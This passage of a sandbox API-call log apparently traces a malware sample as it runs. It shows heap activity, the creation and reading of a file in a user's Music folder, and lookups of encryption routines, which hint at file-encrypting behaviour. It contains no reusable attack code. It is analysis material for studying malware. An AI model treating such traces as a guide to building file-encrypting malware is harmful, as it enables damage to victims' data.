dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0188.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0188.300] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music")) returned 0x11 [0188.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0188.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0188.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0188.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0188.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0188.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0188.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0188.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0188.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0188.302] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.flyingship.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xhgr3.flyingship.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0188.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0188.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0188.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0188.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0188.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0188.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0188.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0188.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0188.303] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0188.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0188.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0188.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0188.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0188.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0188.303] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0188.303] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0188.304] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0188.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0188.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0188.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0188.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0188.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0188.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0188.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0188.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0188.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0188.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0188.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0188.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0188.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0188.305] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0188.305] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x4bb8, lpOverlapped=0x0) returned 1 [0188.307] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0188.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0188.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0188.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0188.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4bb8) returned 0x900190 [0188.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0188.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0188.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0188.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0188.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0188.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0188.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4bb8) returned 0xbea018 [0188.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900190 | out: hHeap=0x8a0000) returned 1 [0188.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.308] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0188.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0188.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0188.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0188.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0188.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4bb8) returned 0x900190 [0188.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0188.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900190 | out: hHeap=0x8a0000) returned 1 [0188.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0188.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0188.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0188.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.350] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0188.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0188.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0188.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0188.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0188.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0188.351] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0188.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0188.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0188.351] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0188.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0188.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0188.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2758 [0188.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0188.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0188.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0188.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0188.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4bb8) returned 0x900190 [0188.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0188.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0188.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0188.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0188.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0188.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2778 [0188.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0188.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0188.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2838 [0188.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0188.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0188.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0188.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b50 [0188.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0188.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0188.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0188.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0188.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0188.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4bb8) returned 0xbeebd8 [0188.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0188.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0188.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0188.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0188.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0188.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0188.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0188.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0188.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0188.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0188.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0188.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0188.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0188.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0188.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0188.353] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0188.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0188.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0188.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0188.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0188.353] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0188.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0188.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0188.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0188.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0188.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0188.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0188.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0188.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0188.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0188.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0188.354] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0188.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0188.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0188.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0188.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26f8 [0188.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0188.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0188.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0188.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0188.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd510 [0188.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0188.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0188.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0188.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0188.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0188.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0188.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0188.355] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0188.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0188.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0188.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0188.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0188.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0188.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0188.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0188.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0188.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0188.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0188.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0188.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0188.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0188.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0188.355] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0188.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0188.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0188.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0188.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0188.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0188.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0188.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0188.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0188.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0188.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0188.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0188.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0188.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0188.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0188.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0188.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0188.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0188.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0188.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0188.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0188.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0188.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0188.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0188.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0188.356] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0188.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0188.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0188.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0188.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0188.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0188.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0188.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0188.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0188.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0188.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0188.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0188.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0188.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0188.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0188.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0188.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0188.357] HeapFree (in: hHeap=0x8a0000, 